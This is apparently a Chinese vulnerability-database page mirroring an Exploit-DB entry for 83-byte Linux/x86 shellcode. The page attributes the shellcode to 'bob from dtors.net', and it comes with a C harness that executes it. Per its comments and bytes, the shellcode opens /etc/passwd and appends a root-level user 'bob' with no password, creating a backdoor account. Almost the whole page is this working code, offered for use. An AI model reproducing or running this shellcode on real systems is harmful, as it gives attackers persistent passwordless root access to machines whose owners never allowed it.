Linux/x86 - Add Root User To /etc/passwd + No Password + exit() Shellcode (83 bytes)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057117 漏洞类型
发布时间 2009-01-01 更新时间 2009-01-01
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Linux_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/43669
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/* Linux x86 shellcode, to open() write() close() and */
/* exit(), adds a root user no-passwd to /etc/passwd */
/* By bob from dtors.net */

#include <stdio.h>

char shellcode[]=
		"\x31\xc0\x31\xdb\x31\xc9\x53\x68\x73\x73\x77"
		"\x64\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74"
		"\x89\xe3\x66\xb9\x01\x04\xb0\x05\xcd\x80\x89"
		"\xc3\x31\xc0\x31\xd2\x68\x6e\x2f\x73\x68\x68"
		"\x2f\x2f\x62\x69\x68\x3a\x3a\x2f\x3a\x68\x3a"
		"\x30\x3a\x30\x68\x62\x6f\x62\x3a\x89\xe1\xb2"
		"\x14\xb0\x04\xcd\x80\x31\xc0\xb0\x06\xcd\x80"
		"\x31\xc0\xb0\x01\xcd\x80";

int
main()
{
        void (*dsr) ();
        (long) dsr = &shellcode;
        printf("Size: %d bytes.\n", sizeof(shellcode)); 
        dsr();
}